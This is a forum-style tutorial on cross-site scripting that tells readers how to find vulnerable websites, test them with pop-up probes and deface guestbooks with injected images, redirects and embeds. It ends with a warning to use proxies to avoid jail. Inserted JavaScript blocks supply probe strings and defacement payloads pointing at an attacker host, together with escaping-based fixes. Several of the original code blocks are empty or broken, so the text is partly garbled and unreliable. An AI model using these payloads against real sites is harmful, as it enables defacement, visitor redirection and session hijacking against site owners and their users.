What is XSS?

XSS stands for "Cross Site Scripting"; it is abbreviated "XSS" rather than "CSS" to avoid confusion with "Cascading Style Sheets", the language that formats the appearance of web pages. Cross Site Scripting is a code injection attack: user-supplied input is placed into a dynamic web page without being sanitized or encoded, so the browser of anyone viewing that page runs the attacker's HTML or JavaScript as if it were part of the site. Once such a flaw is found, an attacker can exploit it through any text field whose contents the page echoes back, such as those in guestbooks, shoutboxes, search forms or even login forms. The impact ranges from defacement to running arbitrary malicious script in victims' browsers and stealing their cookies (session hijacking). Because it needs nothing more than a text field and a browser, XSS is one of the most common attacks directed against websites.

How to find a vulnerable site?

Look for pages that take text from you and display it back: search pages that repeat the query in the results ("Results for: ..."), guestbooks and shoutboxes that show what was posted, login forms that echo the username on failure. A web search turns up plenty of such pages; the test in the next section tells you whether a given one is actually vulnerable.

How to test for an XSS vulnerability?

To test for an XSS vulnerability, put a pop-up script into a text field of the website, preferably a search bar, and submit it. Type one of the following codes into the search bar; if the page is vulnerable you get a pop-up saying "XSS", or whatever text you put in. A pop-up proves that your script ran inside the site's page, which is exactly what an attacker's script would then be able to do.

PHP Code:


There are many scripts that will work; these are just a few of them. It is also recommended that you substitute "XSS" (or the character codes 88,83,83, which spell "XSS" when passed to String.fromCharCode) with other characters, since some sites strip the text "XSS" from their search input. If the pop-up does not appear, view the page source and find where your input landed: if it came back HTML-encoded (&lt;script&gt; instead of <script>) the field is not vulnerable to that probe; if it landed inside a tag attribute or inside an existing script, you need a payload that first closes that context.
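The search-bar test above, modelled in code as an added example (this is not code from the original tutorial). A hypothetical vulnerable search page interpolates the query straight into its HTML; the fixed version HTML-encodes it first. The check is the one a tester actually performs: does the probe come back byte-for-byte unencoded in the page? The page functions, the marker text "XSS" and the probe strings are assumptions.

```javascript
// Added example, not from the original tutorial: a model of the search-bar test.
// A vulnerable page echoes the query into its HTML unchanged; the fixed page
// HTML-encodes it first. Page names, probes and the marker "XSS" are assumptions.

// Hypothetical vulnerable search page: the query is interpolated as raw HTML.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// HTML-encode the five characters that can change the parsing context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[ch]);
}

// The same page with output encoding applied (the fix).
function renderSearchFixed(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Build the obfuscated form of any marker text: the literal marker never appears
// in the request, only its character codes (88,83,83 spell "XSS"). This is the
// tutorial's advice to swap "XSS" for other characters, generalised to any text.
function obfuscatedAlertProbe(text) {
  const codes = Array.from(text, c => c.charCodeAt(0)).join(',');
  return `<script>alert(String.fromCharCode(${codes}))</script>`;
}

// Constructed probes: the plain pop-up, the obfuscated pop-up, and one that
// first closes an attribute value, for input that lands inside a tag.
const PROBES = [
  '<script>alert("XSS")</script>',
  obfuscatedAlertProbe('XSS'),
  '"><img src=x onerror=alert(1)>',
];

// The check: the probe is reflected byte-for-byte, so the browser will parse it
// as markup. A transformed or encoded reflection is not a hit.
function isReflectedUnencoded(render, probe) {
  return render(probe).includes(probe);
}

// Run every probe against a page-rendering function; returns [probe, hit] pairs.
function probeAll(render) {
  return PROBES.map(p => [p, isReflectedUnencoded(render, p)]);
}
```

Against a real site, `render` is an HTTP request followed by reading the response body; the check is unchanged: search the body for the unmodified probe. The fixed page shows why the test stops working once the site encodes output: the probe still comes back, but as text the browser will not execute.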

How to exploit XSS vulnerabilities?

Now that you've discovered a vulnerability, you can attempt to attack the website.

Defacement :-

On an XSS-vulnerable website you can execute most HTML or JavaScript through a text field such as a guestbook. Put your code in the username field (the message field usually blocks HTML and JavaScript, while the username field is often left unfiltered). If the guestbook requires image verification/captcha, fill it in; if it requires an e-mail address, type a fake one. Note the difference from the search-bar test: a guestbook entry is stored by the site and rendered to every visitor who loads the page afterwards, so the injected code runs once per page view rather than only for whoever opens a crafted URL.

Here are some things you can do :-

Insert your deface pic. :-
PHP Code:

Redirect to your deface pic. :-
PHP Code:

Pop-up pic. :-
PHP Code: "your image url here!" )

Embed videos or flash :-
PHP Code:
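The guestbook case above as an added example (not code from the original tutorial): a toy guestbook store that keeps the username untouched while running a blocklist over the message, the raw render that every later visitor receives, and the two checks that close it: an allowlist on the username before storage and HTML-encoding of both fields at render time. The guestbook functions, field names, payloads and attacker URLs are all hypothetical.

```javascript
// Added example, not from the original tutorial: a toy guestbook that shows why a
// payload left in an unfiltered username field is served to every later visitor
// (stored XSS), next to the checks that stop it. Functions, field names, payloads
// and attacker URLs are hypothetical.

// Constructed defacement payloads in the tutorial's four categories.
const DEFACE_PAYLOADS = {
  insertImage: '<img src="http://attacker.example/deface.png">',
  redirect: '<script>window.location="http://attacker.example/deface.html"</script>',
  popupImage: '<script>window.open("http://attacker.example/deface.png")</script>',
  embedVideo: '<iframe src="http://attacker.example/clip" width="400" height="300"></iframe>',
};

// Vulnerable submit: the message field gets a blocklist for <script> tags, the
// username is stored untouched (the asymmetry the tutorial relies on).
function submitVulnerable(store, username, message) {
  store.push({ username, message: message.replace(/<\/?script[^>]*>/gi, '') });
}

// Vulnerable render: raw interpolation. This is what every later visitor
// receives, so a stored payload runs once per page view, not once per attacker.
function renderVulnerable(store) {
  return store
    .map(e => `<div class="entry"><b>${e.username}</b> wrote: ${e.message}</div>`)
    .join('\n');
}

// Check 1, input side: a username is a short token from a fixed alphabet.
// Anything else is rejected before it reaches the store. Free text such as the
// message cannot be allowlisted this way and is stored as typed.
const USERNAME_RE = /^[A-Za-z0-9_]{1,32}$/;

function submitChecked(store, username, message) {
  if (!USERNAME_RE.test(username)) return false; // rejected, nothing stored
  store.push({ username, message });
  return true;
}

// Check 2, output side: HTML-encode every stored field when rendering. Unlike the
// <script> blocklist, this also neutralises <img onerror=...>, <iframe> and the rest.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' })[ch]);
}

function renderSafe(store) {
  return store
    .map(e => `<div class="entry"><b>${escapeHtml(e.username)}</b> wrote: ${escapeHtml(e.message)}</div>`)
    .join('\n');
}

// Quick check over a rendered page: did any active element survive as markup?
function hasActiveContent(html) {
  return /<(script|img|iframe|object|embed)\b/i.test(html);
}
```

The blocklist on the message field is shown as the weak case on purpose: it removes the redirect payload's <script> tags but passes the <img> and <iframe> payloads straight through, which is why encoding at render time, not filtering at input time, is the fix for free-text fields.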

I take no responsibility for the things you do with this tutorial. It's all up to you! If you don't use one or more proxies, then you might end up in jail.


